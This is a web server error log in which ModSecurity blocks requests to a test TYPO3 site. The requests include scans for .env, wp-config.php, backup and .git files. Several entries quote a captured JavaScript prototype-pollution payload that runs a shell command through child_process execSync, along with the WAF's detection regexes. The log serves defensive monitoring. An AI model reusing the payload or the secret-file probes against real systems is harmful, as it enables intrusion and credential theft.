[Tue Mar 10 22:32:52.390362 2026] [:error] [pid 2606453] [client 93.123.109.214:54856] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "abCOBIXIua_918bNo_TL6wAAAAk"]
[Tue Mar 10 22:32:52.390524 2026] [:error] [pid 2606453] [client 93.123.109.214:54856] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "abCOBIXIua_918bNo_TL6wAAAAk"]
[Tue Mar 10 22:32:52.414032 2026] [:error] [pid 2606453] [client 93.123.109.214:54856] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "abCOBIXIua_918bNo_TL7AAAAAk"]
[Tue Mar 10 22:32:52.414207 2026] [:error] [pid 2606453] [client 93.123.109.214:54856] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "abCOBIXIua_918bNo_TL7AAAAAk"]
[Tue Mar 10 22:32:52.414368 2026] [:error] [pid 2606453] [client 93.123.109.214:54856] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "abCOBIXIua_918bNo_TL7AAAAAk"]
[Tue Mar 10 22:32:52.450973 2026] [:error] [pid 2606453] [client 93.123.109.214:54856] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "abCOBIXIua_918bNo_TL7QAAAAk"]
[Tue Mar 10 22:32:52.451153 2026] [:error] [pid 2606453] [client 93.123.109.214:54856] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "abCOBIXIua_918bNo_TL7QAAAAk"]
[Tue Mar 10 22:32:52.451310 2026] [:error] [pid 2606453] [client 93.123.109.214:54856] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "abCOBIXIua_918bNo_TL7QAAAAk"]
[Tue Mar 10 22:32:52.508933 2026] [authz_core:error] [pid 2606453] [client 93.123.109.214:54856] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Mar 10 22:32:52.530375 2026] [:error] [pid 2606453] [client 93.123.109.214:54856] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "abCOBIXIua_918bNo_TL7wAAAAk"]
[Tue Mar 10 22:32:52.530540 2026] [:error] [pid 2606453] [client 93.123.109.214:54856] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "abCOBIXIua_918bNo_TL7wAAAAk"]
[Tue Mar 10 22:32:52.530691 2026] [:error] [pid 2606453] [client 93.123.109.214:54856] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "abCOBIXIua_918bNo_TL7wAAAAk"]
[Tue Mar 10 22:32:52.551680 2026] [:error] [pid 2606453] [client 93.123.109.214:54856] [client 93.123.109.214] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "abCOBIXIua_918bNo_TL8AAAAAk"]
[Tue Mar 10 22:32:52.551786 2026] [:error] [pid 2606453] [client 93.123.109.214:54856] [client 93.123.109.214] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "abCOBIXIua_918bNo_TL8AAAAAk"]
[Tue Mar 10 22:32:52.551939 2026] [:error] [pid 2606453] [client 93.123.109.214:54856] [client 93.123.109.214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "abCOBIXIua_918bNo_TL8AAAAAk"]
[Tue Mar 10 22:32:52.552086 2026] [:error] [pid 2606453] [client 93.123.109.214:54856] [client 93.123.109.214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "abCOBIXIua_918bNo_TL8AAAAAk"]
[Tue Mar 10 22:32:52.607909 2026] [authz_core:error] [pid 2606453] [client 93.123.109.214:54856] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.php.bak
[Tue Mar 10 22:32:52.741386 2026] [authz_core:error] [pid 2606453] [client 93.123.109.214:54856] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Mar 10 22:32:52.764849 2026] [authz_core:error] [pid 2606453] [client 93.123.109.214:54856] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Mar 12 18:37:26.063532 2026] [:error] [pid 2641119] [client 3.135.63.183:52510] [client 3.135.63.183] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "abL51jR2dBIs7tr7loFgegAAAAA"]
[Thu Mar 12 18:37:26.064936 2026] [:error] [pid 2641119] [client 3.135.63.183:52510] [client 3.135.63.183] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\x22: ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "abL51jR2dBIs7tr7loFgegAAAAA"]
[Thu Mar 12 18:37:26.065827 2026] [:error] [pid 2641119] [client 3.135.63.183:52510] [client 3.135.63.183] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "abL51jR2dBIs7tr7loFgegAAAAA"]
[Thu Mar 12 18:37:26.065982 2026] [:error] [pid 2641119] [client 3.135.63.183:52510] [client 3.135.63.183] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "abL51jR2dBIs7tr7loFgegAAAAA"]
[Thu Mar 12 18:37:26.180721 2026] [:error] [pid 2641119] [client 3.135.63.183:52510] [client 3.135.63.183] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271)) found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo $((41*271)) | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "abL51jR2dBIs7tr7loFgewAAAAA"]
[Thu Mar 12 18:37:26.181224 2026] [:error] [pid 2641119] [client 3.135.63.183:52510] [client 3.135.63.183] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\x22: ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "abL51jR2dBIs7tr7loFgewAAAAA"]
[Thu Mar 12 18:37:26.182250 2026] [:error] [pid 2641119] [client 3.135.63.183:52510] [client 3.135.63.183] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "abL51jR2dBIs7tr7loFgewAAAAA"]
[Thu Mar 12 18:37:26.182417 2026] [:error] [pid 2641119] [client 3.135.63.183:52510] [client 3.135.63.183] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "abL51jR2dBIs7tr7loFgewAAAAA"]
[Fri Mar 13 00:14:23.959610 2026] [:error] [pid 2660459] [client 204.76.203.25:38774] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abNIzzghH81Vs2EEIcRDZQAAAAM"]
[Fri Mar 13 00:14:23.959875 2026] [:error] [pid 2660459] [client 204.76.203.25:38774] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abNIzzghH81Vs2EEIcRDZQAAAAM"]
[Fri Mar 13 00:14:23.960039 2026] [:error] [pid 2660459] [client 204.76.203.25:38774] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abNIzzghH81Vs2EEIcRDZQAAAAM"]
[Sun Mar 15 01:04:03.472530 2026] [:error] [pid 2704748] [client 185.167.97.206:52404] [client 185.167.97.206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abX3cyg3BxkZq6NYOIdltQAAAAI"]
[Sun Mar 15 01:04:03.472650 2026] [:error] [pid 2704748] [client 185.167.97.206:52404] [client 185.167.97.206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abX3cyg3BxkZq6NYOIdltQAAAAI"]
[Sun Mar 15 01:04:03.472788 2026] [:error] [pid 2704748] [client 185.167.97.206:52404] [client 185.167.97.206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abX3cyg3BxkZq6NYOIdltQAAAAI"]
[Sun Mar 15 10:46:53.678445 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abaADQY2Zu5JILf9IpngWgAAAAc"]
[Sun Mar 15 10:46:53.679562 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abaADQY2Zu5JILf9IpngWgAAAAc"]
[Sun Mar 15 10:46:53.679693 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "abaADQY2Zu5JILf9IpngWgAAAAc"]
[Sun Mar 15 10:46:53.702102 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "abaADQY2Zu5JILf9IpngWwAAAAc"]
[Sun Mar 15 10:46:53.702284 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "abaADQY2Zu5JILf9IpngWwAAAAc"]
[Sun Mar 15 10:46:53.702415 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "abaADQY2Zu5JILf9IpngWwAAAAc"]
[Sun Mar 15 10:46:53.731299 2026] [:error] [pid 2711295] [client 185.177.72.49:63276] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "abaADQY2Zu5JILf9IpngXAAAAAc"]
